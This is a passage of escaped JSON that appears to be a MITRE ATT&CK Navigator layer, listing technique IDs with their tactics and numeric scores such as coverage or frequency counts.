\"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.002\",\n      \"tactic\": \"discovery\",\n      \"score\": 21,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1216\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1615\",\n      \"tactic\": \"discovery\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": 
\"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.011\",\n      \"tactic\": \"persistence\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1072\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1072\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048.001\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1132.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      
\"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.008\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": 
\"T1546.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.007\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.007\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.014\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.014\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.010\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.010\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      
\"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.002\",\n      \"tactic\": \"discovery\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"execution\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      
\"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546\",\n      \"tactic\": \"persistence\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.004\",\n      \"tactic\": \"execution\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n 
     \"techniqueID\": \"T1134.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1219\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.013\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.007\",\n      \"tactic\": \"defense-evasion\",\n    
  \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1491.001\",\n      \"tactic\": \"impact\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1608\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": 
true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1539\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1211\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1563.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1560\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    
{\n      \"techniqueID\": \"T1542.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1176.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1649\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1120\",\n      \"tactic\": \"discovery\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      
\"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1614.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.005\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1119\",\n      \"tactic\": \"collection\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590.001\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": 
[],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.015\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.015\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574\",\n      \"tactic\": \"persistence\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      
\"techniqueID\": \"T1574\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1039\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1570\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1216.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n 
     \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1217\",\n      \"tactic\": \"discovery\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1622\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1622\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": 
[],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.006\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1620\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": 
